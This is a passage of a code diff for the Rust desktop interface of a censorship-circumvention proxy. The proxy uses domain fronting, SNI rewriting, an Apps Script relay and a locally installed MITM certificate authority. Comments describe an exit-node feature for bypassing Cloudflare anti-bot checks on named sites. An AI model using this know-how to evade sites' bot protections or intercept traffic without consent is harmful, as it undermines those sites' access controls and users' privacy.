             sni_custom_input: String::new(),
             sni_editor_open: false,
             show_log: true,
-            fetch_ips_from_api:c.fetch_ips_from_api,
-            max_ips_to_scan:c.max_ips_to_scan,
+            fetch_ips_from_api: c.fetch_ips_from_api,
+            max_ips_to_scan: c.max_ips_to_scan,
             google_ip_validation: c.google_ip_validation,
-            scan_batch_size:c.scan_batch_size,
+            scan_batch_size: c.scan_batch_size,
             normalize_x_graphql: c.normalize_x_graphql,
             youtube_via_relay: c.youtube_via_relay,
             passthrough_hosts: c.passthrough_hosts.clone(),
+            block_quic: c.block_quic,
+            block_stun: c.block_stun,
+            disable_padding: c.disable_padding,
+            force_http1: c.force_http1,
+            tunnel_doh: c.tunnel_doh,
+            bypass_doh_hosts: c.bypass_doh_hosts.clone(),
+            block_doh: c.block_doh,
+            fronting_groups: c.fronting_groups.clone(),
+            auto_blacklist_strikes: c.auto_blacklist_strikes,
+            auto_blacklist_window_secs: c.auto_blacklist_window_secs,
+            auto_blacklist_cooldown_secs: c.auto_blacklist_cooldown_secs,
+            request_timeout_secs: c.request_timeout_secs,
+            exit_node: c.exit_node.clone(),
         }
     } else {
         FormState {
@@ -313,13 +423,28 @@ fn load_form() -> (FormState, Option<String>) {
             sni_custom_input: String::new(),
             sni_editor_open: false,
             show_log: true,
-            fetch_ips_from_api:false,
-            max_ips_to_scan:100,
-            google_ip_validation:true,
-            scan_batch_size:500,
+            fetch_ips_from_api: false,
+            max_ips_to_scan: 100,
+            google_ip_validation: true,
+            scan_batch_size: 500,
             normalize_x_graphql: false,
             youtube_via_relay: false,
             passthrough_hosts: Vec::new(),
+            block_quic: true,
+            block_stun: true,
+            disable_padding: false,
+            force_http1: false,
+            tunnel_doh: true,
+            bypass_doh_hosts: Vec::new(),
+            block_doh: true,
+            fronting_groups: Vec::new(),
+            // Defaults match `default_auto_blacklist_*` and
+            // `default_request_timeout_secs` in src/config.rs.
+            auto_blacklist_strikes: 3,
+            auto_blacklist_window_secs: 30,
+            auto_blacklist_cooldown_secs: 120,
+            request_timeout_secs: 30,
+            exit_node: mhrv_rs::config::ExitNodeConfig::default(),
         }
     };
     (form, load_err)
@@ -371,8 +496,10 @@ fn sni_pool_for_form(user: Option<&[String]>, front_domain: &str) -> Vec<SniRow>
 
 impl FormState {
     fn to_config(&self) -> Result<Config, String> {
-        let is_google_only = self.mode == "google_only";
-        if !is_google_only {
+        // `direct` and the legacy `google_only` alias both run without
+        // an Apps Script relay, so neither requires a script_id.
+        let is_direct = self.mode == "direct" || self.mode == "google_only";
+        if !is_direct {
             if self.script_id.trim().is_empty() {
                 return Err("Apps Script ID is required".into());
             }
@@ -450,10 +577,10 @@ impl FormState {
                     Some(active)
                 }
             },
-            fetch_ips_from_api:self.fetch_ips_from_api,
+            fetch_ips_from_api: self.fetch_ips_from_api,
             max_ips_to_scan: self.max_ips_to_scan,
-            google_ip_validation:self.google_ip_validation,
-            scan_batch_size:self.scan_batch_size,
+            google_ip_validation: self.google_ip_validation,
+            scan_batch_size: self.scan_batch_size,
             normalize_x_graphql: self.normalize_x_graphql,
             // UI form doesn't expose youtube_via_relay yet — it's a
             // config-only flag for now. Passed through from the loaded
@@ -462,6 +589,50 @@ impl FormState {
             // Similarly config-only for now; round-trips through the
             // file so the UI doesn't drop the user's entries on save.
             passthrough_hosts: self.passthrough_hosts.clone(),
+            // Issue #213: block_quic is config-only for now (no UI
+            // control yet). Round-trip through the file so save
+            // doesn't drop a user-set true.
+            block_quic: self.block_quic,
+            block_stun: self.block_stun,
+            // Issue #391: disable_padding is config-only for now.
+            // Round-trip preserves the user's choice.
+            disable_padding: self.disable_padding,
+            // HTTP/2 multiplexing kill switch. Config-only for now;
+            // round-trip preserves the user's choice across Save.
+            force_http1: self.force_http1,
+            // DoH bypass is enabled-by-default with `tunnel_doh = false`.
+            // Round-trip the user's choice (and any extra hostnames they
+            // added) so save doesn't drop them.
+            tunnel_doh: self.tunnel_doh,
+            bypass_doh_hosts: self.bypass_doh_hosts.clone(),
+            // PR #763: block_doh defaults to true (rejects browser DoH so
+            // tun2proxy's virtual DNS handles name lookups, saving the
+            // ~1.5s tunnel round-trip per DNS query). Desktop UI doesn't
+            // expose a toggle yet (Android does), so this is a config-only
+            // round-trip — we keep whatever the user has in config.json.
+            block_doh: self.block_doh,
+            // Multi-edge fronting groups: file-edited only for now,
+            // round-tripped through the UI so Save doesn't drop them.
+            fronting_groups: self.fronting_groups.clone(),
+            // PR #448 (Android): adaptive coalesce window. Desktop UI
+            // doesn't expose sliders for these yet (Android does), so
+            // we pass 0 to keep the compiled defaults (40ms step,
+            // 1000ms max). Round-trip planned for the v1.8.x desktop UI
+            // batch alongside the system-proxy toggle (#432).
+            coalesce_step_ms: 0,
+            coalesce_max_ms: 0,
+            // Auto-blacklist + batch timeout: config-only knobs (#391,
+            // #444, #430). Round-trip through FormState so Save doesn't
+            // drop hand-edited values. UI editor planned alongside the
+            // v1.8.x desktop UI batch.
+            auto_blacklist_strikes: self.auto_blacklist_strikes,
+            auto_blacklist_window_secs: self.auto_blacklist_window_secs,
+            auto_blacklist_cooldown_secs: self.auto_blacklist_cooldown_secs,
+            request_timeout_secs: self.request_timeout_secs,
+            // Exit-node config (CF-anti-bot bypass for chatgpt.com / claude.ai
+            // / grok.com / x.com). Round-trip through FormState — config-only
+            // editing for now, UI editor planned for v1.9.x desktop UI batch.
+            exit_node: self.exit_node.clone(),
         })
     }
 }
@@ -513,12 +684,68 @@ struct ConfigWire<'a> {
     max_ips_to_scan: usize,
     scan_batch_size: usize,
     google_ip_validation: bool,
+    /// Default false (= bypass DoH). Only emitted when explicitly true
+    /// so unchanged configs stay clean.
+    #[serde(skip_serializing_if = "is_false")]
+    tunnel_doh: bool,
+    #[serde(skip_serializing_if = "Vec::is_empty")]
+    bypass_doh_hosts: &'a Vec<String>,
+    /// PR #763: default true (= browser DoH rejected, system DNS used).
+    /// Skip when matching default to keep unchanged configs clean —
+    /// emit only when the user has explicitly disabled the block.
+    #[serde(skip_serializing_if = "is_true")]
+    block_doh: bool,
+    /// Default true. Emit only when the user disables STUN/TURN blocking.
+    #[serde(skip_serializing_if = "is_true")]
+    block_stun: bool,
+    #[serde(skip_serializing_if = "Vec::is_empty")]
+    fronting_groups: &'a Vec<FrontingGroup>,
+    /// Auto-blacklist tuning + batch timeout (#391, #444, #430). Skip
+    /// serialization when matching the historical defaults so unchanged
+    /// configs stay clean — only emitted when the user has explicitly
+    /// tuned them.
+    #[serde(skip_serializing_if = "is_default_strikes")]
+    auto_blacklist_strikes: u32,
+    #[serde(skip_serializing_if = "is_default_window_secs")]
+    auto_blacklist_window_secs: u64,
+    #[serde(skip_serializing_if = "is_default_cooldown_secs")]
+    auto_blacklist_cooldown_secs: u64,
+    #[serde(skip_serializing_if = "is_default_timeout_secs")]
+    request_timeout_secs: u64,
+    /// HTTP/2 multiplexing kill switch. Default false (h2 active); only
+    /// emitted on save when the user has explicitly disabled h2, so
+    /// unchanged configs stay clean.
+    #[serde(skip_serializing_if = "is_false")]
+    force_http1: bool,
+    /// Exit-node config (CF-anti-bot bypass for chatgpt.com / claude.ai /
+    /// grok.com / x.com via exit-node second-hop relay). Skip when fully
+    /// default (disabled with no URL/PSK/hosts) so configs without
+    /// exit-node setup stay clean. Round-tripped through FormState so
+    /// Save preserves user-edited values.
+    #[serde(skip_serializing_if = "is_default_exit_node")]
+    exit_node: &'a mhrv_rs::config::ExitNodeConfig,
+}
+
+fn is_default_strikes(v: &u32) -> bool { matches!(*v, 3) }
+fn is_default_window_secs(v: &u64) -> bool { matches!(*v, 30) }
+fn is_default_cooldown_secs(v: &u64) -> bool { matches!(*v, 120) }
+fn is_default_timeout_secs(v: &u64) -> bool { matches!(*v, 30) }
+fn is_default_exit_node(en: &&mhrv_rs::config::ExitNodeConfig) -> bool {
+    // True only for a disabled exit node with no relay URL, PSK or hosts and
+    // a mode that is empty or "selective" — serde then omits the field.
+    let mode_untouched = en.mode.is_empty() || en.mode == "selective";
+    let nothing_filled_in = en.relay_url.is_empty() && en.psk.is_empty() && en.hosts.is_empty();
+    !en.enabled && nothing_filled_in && mode_untouched
+}
 
 fn is_false(b: &bool) -> bool {
     !*b
 }
 
+fn is_true(b: &bool) -> bool {
+    *b
+}
+
 fn is_zero_u8(v: &u8) -> bool {
     *v == 0
 }
@@ -561,6 +788,17 @@ impl<'a> From<&'a Config> for ConfigWire<'a> {
             max_ips_to_scan: c.max_ips_to_scan,
             scan_batch_size: c.scan_batch_size,
             google_ip_validation: c.google_ip_validation,
+            tunnel_doh: c.tunnel_doh,
+            bypass_doh_hosts: &c.bypass_doh_hosts,
+            block_doh: c.block_doh,
+            block_stun: c.block_stun,
+            fronting_groups: &c.fronting_groups,
+            auto_blacklist_strikes: c.auto_blacklist_strikes,
+            auto_blacklist_window_secs: c.auto_blacklist_window_secs,
+            auto_blacklist_cooldown_secs: c.auto_blacklist_cooldown_secs,
+            request_timeout_secs: c.request_timeout_secs,
+            force_http1: c.force_http1,
+            exit_node: &c.exit_node,
         }
     }
 }
@@ -584,10 +822,7 @@ fn section(ui: &mut egui::Ui, title: &str, body: impl FnOnce(&mut egui::Ui)) {
     ui.add_space(2.0);
     let frame = egui::Frame::none()
         .fill(egui::Color32::from_rgb(28, 30, 34))
-        .stroke(egui::Stroke::new(
-            1.0,
-            egui::Color32::from_rgb(50, 54, 60),
-        ))
+        .stroke(egui::Stroke::new(1.0, egui::Color32::from_rgb(50, 54, 60)))
         .rounding(6.0)
         .inner_margin(egui::Margin::same(10.0));
     frame.show(ui, body);
@@ -596,10 +831,14 @@ fn section(ui: &mut egui::Ui, title: &str, body: impl FnOnce(&mut egui::Ui)) {
 /// A primary accent-filled button. Used for the headline action in a row
 /// (Start / Stop / SNI pool).
 fn primary_button(text: &str) -> egui::Button<'_> {
-    egui::Button::new(egui::RichText::new(text).color(egui::Color32::WHITE).strong())
-        .fill(ACCENT)
-        .min_size(egui::vec2(120.0, 28.0))
-        .rounding(4.0)
+    egui::Button::new(
+        egui::RichText::new(text)
+            .color(egui::Color32::WHITE)
+            .strong(),
+    )
+    .fill(ACCENT)
+    .min_size(egui::vec2(120.0, 28.0))
+    .rounding(4.0)
 }
 
 /// A compact form row: label on the left (fixed width for vertical alignment),
@@ -608,17 +847,18 @@ fn form_row(
     ui: &mut egui::Ui,
     label: &str,
     hover: Option<&str>,
-    widget: impl FnOnce(&mut egui::Ui),
+    widget: impl FnOnce(&mut egui::Ui, egui::Id),
 ) {
     ui.horizontal(|ui| {
         let resp = ui.add_sized(
             [120.0, 20.0],
             egui::Label::new(egui::RichText::new(label).color(egui::Color32::from_gray(200))),
         );
+        let label_id = resp.id;
         if let Some(h) = hover {
             resp.on_hover_text(h);
         }
-        widget(ui);
+        widget(ui, label_id);
     });
 }
 
@@ -697,19 +937,20 @@ impl eframe::App for App {
 
             // ── Section: Mode ─────────────────────────────────────────────
             // Surfacing the mode at the top of the form because it changes
-            // which of the sections below are actually used. google_only is
-            // a bootstrap mode for users who don't yet have internet access
-            // to deploy Code.gs — once deployed, they switch back to
-            // apps_script.
+            // which of the sections below are actually used. `direct` runs
+            // without the Apps Script relay (Google edge + any configured
+            // fronting_groups via the SNI-rewrite tunnel only) — useful as
+            // a bootstrap to deploy Code.gs, or as a standalone mode for
+            // users who only need access to fronting-group targets.
             section(ui, "Mode", |ui| {
                 form_row(ui, "Mode", Some(
                     "apps_script: DPI bypass via Apps Script relay (needs cert).\n\
                      full: tunnel ALL traffic through Apps Script + tunnel node (no cert needed).\n\
-                     google_only: bootstrap — direct SNI-rewrite tunnel to *.google.com only."
-                ), |ui| {
+                     direct: SNI-rewrite tunnel only — no relay (Google edge + any fronting_groups)."
+                ), |ui, _label_id| {
                     egui::ComboBox::from_id_source("mode")
                         .selected_text(match self.form.mode.as_str() {
-                            "google_only" => "Google-only (bootstrap)",
+                            "direct" | "google_only" => "Direct (no relay)",
                             "full" => "Full tunnel (no cert)",
                             _ => "Apps Script (MITM)",
                         })
@@ -726,16 +967,16 @@ impl eframe::App for App {
                             );
                             ui.selectable_value(
                                 &mut self.form.mode,
-                                "google_only".into(),
-                                "Google-only (bootstrap)",
+                                "direct".into(),
+                                "Direct (no relay)",
                             );
                         });
                 });
-                if self.form.mode == "google_only" {
+                if self.form.mode == "direct" || self.form.mode == "google_only" {
                     ui.horizontal(|ui| {
                         ui.add_space(120.0 + 8.0);
                         ui.small(egui::RichText::new(
-                            "Bootstrap mode — reach script.google.com to deploy Code.gs, then switch back to Apps Script.",
+                            "Direct mode — SNI-rewrite tunnel only. Reach the Google edge (and any configured fronting_groups) without an Apps Script relay.",
                         )
                         .color(OK_GREEN));
                     });
@@ -751,19 +992,20 @@ impl eframe::App for App {
                 }
             });
 
-            let google_only = self.form.mode == "google_only";
+            let direct_mode = self.form.mode == "direct" || self.form.mode == "google_only";
 
             // ── Section: Apps Script relay ────────────────────────────────
             section(ui, "Apps Script relay", |ui| {
-                ui.add_enabled_ui(!google_only, |ui| {
+                ui.add_enabled_ui(!direct_mode, |ui| {
                     form_row(ui, "Deployment IDs", Some(
                         "One deployment ID per line. Proxy round-robins between them and sidelines \
                          any ID that hits its daily quota for 10 minutes before retrying."
-                    ), |ui| {
+                    ), |ui, label_id| {
                         ui.add(egui::TextEdit::multiline(&mut self.form.script_id)
                             .hint_text("one deployment ID per line")
                             .desired_width(f32::INFINITY)
-                            .desired_rows(3));
+                            .desired_rows(3))
+                        .labelled_by(label_id);
                     });
 
                     let id_count = self.form.script_id
@@ -785,19 +1027,21 @@ impl eframe::App for App {
 
                     form_row(ui, "Auth key", Some(
                         "Same value as AUTH_KEY inside your Code.gs."
-                    ), |ui| {
+                    ), |ui, label_id| {
                         ui.add(egui::TextEdit::singleline(&mut self.form.auth_key)
                             .password(!self.form.show_auth_key)
-                            .desired_width(f32::INFINITY));
+                            .desired_width(f32::INFINITY))
+                        .labelled_by(label_id);
                     });
                 });
             });
 
             // ── Section: Network ──────────────────────────────────────────
             section(ui, "Network", |ui| {
-                form_row(ui, "Google IP", None, |ui| {
+                form_row(ui, "Google IP", None, |ui, label_id| {
                     ui.add(egui::TextEdit::singleline(&mut self.form.google_ip)
-                        .desired_width(f32::INFINITY));
+                        .desired_width(f32::INFINITY))
+                    .labelled_by(label_id);
                 });
                 ui.horizontal(|ui| {
                     ui.add_space(120.0 + 8.0);
@@ -835,15 +1079,104 @@ impl eframe::App for App {
                     }
                 });
 
-                form_row(ui, "Front domain", None, |ui| {
+                form_row(ui, "Front domain", None, |ui, label_id| {
                     ui.add(egui::TextEdit::singleline(&mut self.form.front_domain)
-                        .desired_width(f32::INFINITY));
+                        .desired_width(f32::INFINITY))
+                    .labelled_by(label_id);
                 });
 
-                form_row(ui, "Listen host", None, |ui| {
-                    ui.add(egui::TextEdit::singleline(&mut self.form.listen_host)
-                        .desired_width(f32::INFINITY));
+                // Network sharing: phones, tablets, other laptops on the
+                // same Wi-Fi can use this proxy when the bind address is
+                // 0.0.0.0 instead of 127.0.0.1. We expose this as a
+                // single-checkbox UI rather than the raw `listen_host`
+                // text field — typing `0.0.0.0` from memory is enough of
+                // a friction point that almost no one does it. Power
+                // users with a custom bind IP (specific NIC) can still
+                // edit `listen_host` directly in `config.json`; we
+                // detect that case and show a "Custom bind" badge so
+                // the checkbox doesn't silently overwrite their setting
+                // on the next Save.
+                //
+                // Snapshot the relevant values before entering form_row's
+                // closure. A checkbox toggle has to change `self.form.listen_host`,
+                // so the closure reads these copies, records any new value in
+                // `new_listen_host`, and the write-back happens after form_row returns.
+                let listen_host_snapshot = self.form.listen_host.trim().to_string();
+                let listen_port_snapshot = self.form.listen_port.trim().to_string();
+                let socks5_port_snapshot = self.form.socks5_port.trim().to_string();
+                let was_share_on_lan = is_share_on_lan(&listen_host_snapshot);
+                let lower_snapshot = listen_host_snapshot.to_ascii_lowercase();
+                let is_custom_bind = !listen_host_snapshot.is_empty()
+                    && !was_share_on_lan
+                    && lower_snapshot != "127.0.0.1"
+                    && lower_snapshot != "localhost";
+                let mut new_listen_host: Option<String> = None;
+                form_row(ui, "Network", Some(
+                    "By default the proxy is reachable only from this computer. \
+                     Turn this on to let phones, tablets, and other laptops on the \
+                     same Wi-Fi (or a hotspot you're sharing) use it too. The \
+                     other devices then point their HTTP / SOCKS5 proxy at the \
+                     LAN IP shown below. Make sure your firewall lets in the proxy \
+                     port — macOS pops up a Firewall prompt the first time."
+                ), |ui, _label_id| {
+                    if is_custom_bind {
+                        // The user manually wrote a specific bind IP —
+                        // don't let the checkbox stomp on it. Show what
+                        // they have and tell them to edit config.json
+                        // if they want to change it.
+                        ui.vertical(|ui| {
+                            ui.label(egui::RichText::new(format!(
+                                "Custom bind: {}",
+                                listen_host_snapshot
+                            )).color(egui::Color32::from_rgb(220, 180, 100)));
+                            ui.small("Edit `listen_host` in config.json to change.");
+                        });
+                    } else {
+                        let mut share = was_share_on_lan;
+                        if ui.checkbox(&mut share, "Share with other devices on my Wi-Fi / network").changed() {
+                            new_listen_host = Some(if share {
+                                "0.0.0.0".to_string()
+                            } else {
+                                "127.0.0.1".to_string()
+                            });
+                        }
+                        if share {
+                            // detect_lan_ip() opens a UDP socket and
+                            // asks the kernel which interface a packet
+                            // to a public IP would use. Cheap (none of
+                            // the syscalls performs network I/O) and
+                            // accurate (it's the same selection any
+                            // outbound connection would make).
+                            match detect_lan_ip() {
+                                Some(ip) => {
+                                    let port = if listen_port_snapshot.is_empty() {
+                                        "8085"
+                                    } else {
+                                        listen_port_snapshot.as_str()
+                                    };
+                                    let socks_port = if socks5_port_snapshot.is_empty() {
+                                        "8086"
+                                    } else {
+                                        socks5_port_snapshot.as_str()
+                                    };
+                                    ui.small(egui::RichText::new(format!(
+                                        "Other devices: HTTP {}:{}  ·  SOCKS5 {}:{}",
+                                        ip, port, ip, socks_port,
+                                    )).color(egui::Color32::from_rgb(120, 200, 140)));
+                                }
+                                None => {
+                                    ui.small(egui::RichText::new(
+                                        "Couldn't detect your LAN IP. Find it in System Settings \
+                                         → Network → Wi-Fi → Details (macOS) or `ipconfig` (Windows)."
+                                    ).color(egui::Color32::from_rgb(220, 180, 100)));
+                                }
+                            }
+                        }
+                    }
                 });
+                if let Some(updated) = new_listen_host {
+                    self.form.listen_host = updated;
+                }
 
                 ui.horizontal(|ui| {
                     ui.add_sized(
@@ -851,11 +1184,15 @@ impl eframe::App for App {
                         egui::Label::new(egui::RichText::new("Ports")
                             .color(egui::Color32::from_gray(200))),
                     );
-                    ui.label(egui::RichText::new("HTTP").small());
-                    ui.add(egui::TextEdit::singleline(&mut self.form.listen_port).desired_width(70.0));
+                    let http_label = ui.label(egui::RichText::new("HTTP").small());
+                    ui.add(egui::TextEdit::singleline(&mut self.form.listen_port)
+                        .desired_width(70.0))
+                    .labelled_by(http_label.id);
                     ui.add_space(10.0);
-                    ui.label(egui::RichText::new("SOCKS5").small());
-                    ui.add(egui::TextEdit::singleline(&mut self.form.socks5_port).desired_width(70.0));
+                    let socks_label = ui.label(egui::RichText::new("SOCKS5").small());
+                    ui.add(egui::TextEdit::singleline(&mut self.form.socks5_port)
+                        .desired_width(70.0))
+                    .labelled_by(socks_label.id);
                 });
             });
 
@@ -880,23 +1217,24 @@ impl eframe::App for App {
                          When set, non-HTTP / raw-TCP traffic (Telegram MTProto, IMAP, SSH, …) \
                          is chained through it instead of direct. HTTP/HTTPS still go through \
                          the Apps Script relay."
-                    ), |ui| {
+                    ), |ui, label_id| {
                         ui.add(egui::TextEdit::singleline(&mut self.form.upstream_socks5)
                             .hint_text("empty = direct; 127.0.0.1:50529 for local xray")
-                            .desired_width(f32::INFINITY));
+                            .desired_width(f32::INFINITY))
+                        .labelled_by(label_id);
                     });
 
                     form_row(ui, "Parallel dispatch", Some(
                         "Fire N Apps Script IDs in parallel per request and take the first \
                          response. 0/1 = off. 2-3 kills long-tail latency at N× quota cost. \
                          Only effective with multiple IDs configured."
-                    ), |ui| {
+                    ), |ui, _label_id| {
                         ui.add(egui::DragValue::new(&mut self.form.parallel_relay)
                             .speed(1)
                             .range(0..=8));
                     });
 
-                    form_row(ui, "Log level", None, |ui| {
+                    form_row(ui, "Log level", None, |ui, _label_id| {
                         egui::ComboBox::from_id_source("loglevel")
                             .selected_text(&self.form.log_level)
                             .show_ui(ui, |ui| {
@@ -937,6 +1275,25 @@ impl eframe::App for App {
                              Script relay instead — slower for video, but the visible SNI matches the site.",
                         );
                     });
+                    ui.horizontal(|ui| {
+                        ui.add_space(120.0 + 8.0);
+                        ui.checkbox(&mut self.form.block_quic, "Block QUIC (UDP/443)")
+                            .on_hover_text(
+                                "Drop QUIC (UDP port 443) so browsers fall back to TCP/HTTPS. \
+                                 QUIC over the TCP-based tunnel causes TCP-over-TCP meltdown \
+                                 (<1 Mbps). Browsers detect the drop and switch to TCP within seconds. \
+                                 Issue #213, #793.",
+                            );
+                    });
+                    ui.horizontal(|ui| {
+                        ui.add_space(120.0 + 8.0);
+                        ui.checkbox(&mut self.form.block_stun, "Block STUN/TURN UDP")
+                            .on_hover_text(
+                                "Drop WebRTC STUN/TURN UDP ports 3478, 5349, and 19302 so apps \
+                                 such as Meet, Discord, and WhatsApp move to TCP TURN instead of \
+                                 waiting on UDP ICE retries.",
+                            );
+                    });
                 });
             });
 
@@ -945,7 +1302,12 @@ impl eframe::App for App {
             ui.horizontal(|ui| {
                 if ui.add(primary_button("Save config")).clicked() {
                     match self.form.to_config().and_then(|c| save_config(&c)) {
-                        Ok(p) => self.toast = Some((format!("Saved to {}", p.display()), Instant::now())),
+                        Ok(p) => {
+                            // Apply the new log level live so users don't have to
+                            // restart for the combobox to take effect (#401).
+                            apply_log_level(&self.form.log_level);
+                            self.toast = Some((format!("Saved to {}", p.display()), Instant::now()));
+                        }
                         Err(e) => self.toast = Some((format!("Save failed: {}", e), Instant::now())),
                     }
                 }
@@ -1074,7 +1436,7 @@ impl eframe::App for App {
                             ),
                         ),
                         ("bytes today", fmt_bytes(s.today_bytes)),
-                        ("UTC day", s.today_key.clone()),
+                        ("PT day", s.today_key.clone()),
                         ("resets in", reset_str),
                     ];
                     egui::Grid::new("usage_today")
@@ -1209,9 +1571,54 @@ impl eframe::App for App {
             // Secondary actions — smaller, grouped together on their own line.
             ui.add_space(4.0);
             ui.horizontal(|ui| {
-                if ui.small_button("Install CA").clicked() {
-                    let _ = self.cmd_tx.send(Cmd::InstallCa);
-                }
+                // Install CA and Remove CA share a single in-flight flag
+                // so back-to-back clicks can't race — an in-flight
+                // install would otherwise re-trust the CA after Remove
+                // deleted it (or vice versa). Both buttons disable when
+                // either op is running.
+                let (cert_op_in_flight, proxy_active) = {
+                    let s = self.shared.state.lock().unwrap();
+                    (s.cert_op_in_progress, s.proxy_active)
+                };
+
+                let install_hover = if cert_op_in_flight {
+                    "A cert install/remove is already in progress."
+                } else {
+                    "Install the MITM CA into the OS trust store (and NSS if certutil \
+                     is available)."
+                };
+                ui.add_enabled_ui(!cert_op_in_flight, |ui| {
+                    if ui
+                        .small_button("Install CA")
+                        .on_hover_text(install_hover)
+                        .clicked()
+                    {
+                        let _ = self.cmd_tx.send(Cmd::InstallCa);
+                    }
+                });
+
+                let remove_hover = if proxy_active || running {
+                    "Stop the proxy first — the CA keypair is held in memory by the \
+                     running MITM engine, and removing it now would break HTTPS for \
+                     every site until restart."
+                } else if cert_op_in_flight {
+                    "A cert install/remove is already in progress."
+                } else {
+                    "Remove the MITM CA from the OS trust store (verified by name) \
+                     and delete the on-disk ca/ directory. NSS cleanup (Firefox/Chrome) \
+                     is best-effort and logs a hint if certutil is missing or a browser \
+                     has the DB locked. A fresh CA is generated the next time you start \
+                     the proxy. Your config.json and the Apps Script deployment are NOT \
+                     touched — no need to redeploy Code.gs."
+                };
+                ui.add_enabled_ui(!proxy_active && !running && !cert_op_in_flight, |ui| {
+                    if ui.small_button("Remove CA")
+                        .on_hover_text(remove_hover)
+                        .clicked()
+                    {
+                        let _ = self.cmd_tx.send(Cmd::RemoveCa);
+                    }
+                });
                 if ui.small_button("Check CA").clicked() {
                     let _ = self.cmd_tx.send(Cmd::CheckCaTrusted);
                 }
@@ -1588,11 +1995,19 @@ impl App {
                         for (i, row) in self.form.sni_pool.iter_mut().enumerate() {
                             ui.horizontal(|ui| {
                                 ui.checkbox(&mut row.enabled, "");
+                                let sni_label = ui.add_sized(
+                                    [0.0, 0.0],
+                                    egui::Label::new(
+                                        egui::RichText::new(format!("SNI name {}", i))
+                                            .color(egui::Color32::TRANSPARENT),
+                                    ),
+                                );
                                 ui.add(
                                     egui::TextEdit::singleline(&mut row.name)
                                         .desired_width(NAME_W)
                                         .font(egui::TextStyle::Monospace),
-                                );
+                                )
+                                .labelled_by(sni_label.id);
                                 let status_txt = match probe_map.get(&row.name) {
                                     Some(SniProbeState::Ok(ms)) => {
                                         egui::RichText::new(format!("ok  {} ms", ms))
@@ -1647,11 +2062,19 @@ impl App {
 
                 ui.separator();
                 ui.horizontal(|ui| {
+                    let custom_label = ui.add_sized(
+                        [0.0, 0.0],
+                        egui::Label::new(
+                            egui::RichText::new("Custom SNI")
+                                .color(egui::Color32::TRANSPARENT),
+                        ),
+                    );
                     ui.add(
                         egui::TextEdit::singleline(&mut self.form.sni_custom_input)
                             .hint_text("add a custom SNI (e.g. translate.google.com)")
                             .desired_width(280.0),
-                    );
+                    )
+                    .labelled_by(custom_label.id);
                     let add_clicked = ui.button("+ Add").clicked();
                     if add_clicked {
                         let new_name = self.form.sni_custom_input.trim().to_string();
@@ -1736,13 +2159,16 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                     });
                 }
             }
-            // In background_thread function, modify the Cmd::Start handler:
             Ok(Cmd::Start(cfg)) => {
                 if active.is_some() {
                     push_log(&shared, "[ui] already running");
                     continue;
                 }
                 push_log(&shared, "[ui] starting proxy...");
+                // Flip proxy_active synchronously so a `Remove CA` click
+                // queued in the same frame as Start is rejected before
+                // the MITM manager begins loading.
+                shared.state.lock().unwrap().proxy_active = true;
                 let shared2 = shared.clone();
                 let fronter_slot: Arc<AsyncMutex<Option<Arc<DomainFronter>>>> =
                     Arc::new(AsyncMutex::new(None));
@@ -1756,7 +2182,9 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                         Ok(m) => m,
                         Err(e) => {
                             push_log(&shared2, &format!("[ui] MITM init failed: {}", e));
-                            shared2.state.lock().unwrap().running = false;
+                            let mut s = shared2.state.lock().unwrap();
+                            s.running = false;
+                            s.proxy_active = false;
                             return;
                         }
                     };
@@ -1765,11 +2193,13 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                         Ok(s) => s,
                         Err(e) => {
                             push_log(&shared2, &format!("[ui] proxy build failed: {}", e));
-                            shared2.state.lock().unwrap().running = false;
+                            let mut st = shared2.state.lock().unwrap();
+                            st.running = false;
+                            st.proxy_active = false;
                             return;
                         }
                     };
-                    // `fronter()` is `None` in google_only (bootstrap) mode — the
+                    // `fronter()` is `None` in direct mode — the
                     // status panel's relay stats simply show no data in that case.
                     *fronter_slot2.lock().await = server.fronter();
                     {
@@ -1792,8 +2222,15 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                         push_log(&shared2, &format!("[ui] proxy error: {}", e));
                     }
 
-                    shared2.state.lock().unwrap().running = false;
-                    shared2.state.lock().unwrap().started_at = None;
+                    {
+                        let mut st = shared2.state.lock().unwrap();
+                        st.running = false;
+                        st.started_at = None;
+                        // Self-exit path (e.g. bind error after startup,
+                        // or normal shutdown without Cmd::Stop). The
+                        // Stop handler clears this too — either is fine.
+                        st.proxy_active = false;
+                    }
                     push_log(&shared2, "[ui] proxy stopped");
                 });
 
@@ -1819,13 +2256,50 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                         }
                     });
 
-                    shared.state.lock().unwrap().running = false;
-                    shared.state.lock().unwrap().started_at = None;
+                    let mut st = shared.state.lock().unwrap();
+                    st.running = false;
+                    st.started_at = None;
+                    st.proxy_active = false;
                 }
             }
 
             Ok(Cmd::Test(cfg)) => {
                 let shared2 = shared.clone();
+                // Short-circuit modes where `test_cmd::run` deliberately
+                // refuses (full mode, direct mode). Those return false
+                // even when the proxy is healthy, which surfaced as
+                // "Test failed" + alarming red status — see #665. Show
+                // a friendly notice instead and skip the test path.
+                let mode_kind = cfg.mode_kind().ok();
+                let mode_explainer = match mode_kind {
+                    Some(mhrv_rs::config::Mode::Full) => Some(
+                        "Test Relay is wired only for apps_script mode. \
+                         In full mode the data plane is the tunnel-node — \
+                         to verify it end-to-end, start the proxy and load \
+                         https://whatismyipaddress.com in your browser \
+                         via 127.0.0.1:8085. The IP shown should be your \
+                         tunnel-node's VPS IP. Tracking a real Full-mode \
+                         test in #160."
+                    ),
+                    Some(mhrv_rs::config::Mode::Direct) => Some(
+                        "Test Relay is wired only for apps_script mode. \
+                         In direct mode there is no Apps Script relay — \
+                         every request goes through the SNI-rewrite tunnel \
+                         straight to Google's edge. Verify by loading \
+                         https://www.google.com via the proxy."
+                    ),
+                    _ => None,
+                };
+                if let Some(msg) = mode_explainer {
+                    {
+                        let mut st = shared.state.lock().unwrap();
+                        st.last_test_ok = None;
+                        st.last_test_msg = msg.into();
+                        st.last_test_msg_at = Some(Instant::now());
+                    }
+                    push_log(&shared, &format!("[ui] test skipped: {}", msg));
+                    continue;
+                }
                 push_log(&shared, "[ui] running test...");
                 rt.spawn(async move {
                     let ok = test_cmd::run(&cfg).await;
@@ -1848,29 +2322,106 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                 });
             }
             Ok(Cmd::InstallCa) => {
+                // Share the cert-op flag with Remove CA so the two
